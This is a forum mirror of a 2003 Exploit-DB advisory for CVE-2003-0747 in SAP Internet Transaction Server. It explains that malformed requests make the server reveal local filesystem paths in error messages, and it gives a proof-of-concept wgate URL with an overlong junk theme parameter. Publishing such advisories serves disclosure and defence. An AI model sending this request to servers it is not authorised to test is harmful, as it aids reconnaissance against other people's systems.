- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 23069
- Проверка EDB
-
- Пройдено
- Автор
- MARTIN EISZNER
- Тип уязвимости
- REMOTE
- Платформа
- MULTIPLE
- CVE
- cve-2003-0747
- Дата публикации
- 2003-08-30
Код:
source: https://www.securityfocus.com/bid/8515/info
A vulnerability has been discovered in SAP Internet Transaction Server (SITS)that could allow an attacker to obtain sensitive information. The problem occurs due to SITS disclosing sensitive local filesystem information when handling malformed requests. Specifically, an attacker who submits a request containing invalid values will receive an error response message in return. This response may contain sensitive information.
http://www.server.name/scripts/wgate/pbw2/!?
with params:
~runtimemode=DM&
~language=en&
~theme=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx&- Источник
- www.exploit-db.com
